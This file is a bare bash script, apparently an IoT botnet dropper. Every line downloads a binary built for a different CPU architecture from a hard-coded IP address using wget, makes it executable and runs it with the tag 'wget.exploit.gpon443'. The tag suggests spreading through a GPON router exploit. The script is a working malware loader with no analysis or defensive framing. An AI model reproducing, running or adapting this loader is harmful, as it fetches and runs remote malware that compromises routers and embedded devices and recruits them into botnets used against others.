#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.154.224/wrgjwrgjwrg246356356356/hx86;  chmod +x *;./hx86 wget.exploit.gpon443
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.154.224/wrgjwrgjwrg246356356356/hmips; chmod +x *;./hmips wget.exploit.gpon443
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.154.224/wrgjwrgjwrg246356356356/hmpsl; chmod +x *;./hmpsl wget.exploit.gpon443
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.154.224/wrgjwrgjwrg246356356356/harm4; chmod +x *;./harm wget.exploit.gpon443
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.154.224/wrgjwrgjwrg246356356356/harm5; chmod +x *;./harm5 wget.exploit.gpon443
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.154.224/wrgjwrgjwrg246356356356/harm6; chmod +x *;./harm6 wget.exploit.gpon443
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.154.224/wrgjwrgjwrg246356356356/harm7; chmod +x *;./harm7 wget.exploit.gpon443
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.154.224/wrgjwrgjwrg246356356356/hppc; chmod +x *;./hppc wget.exploit.gpon443
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.154.224/wrgjwrgjwrg246356356356/hm68k; chmod +x *;./hm68k wget.exploit.gpon443
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.154.224/wrgjwrgjwrg246356356356/hsh4; chmod +x *;./hsh4 wget.exploit.gpon443
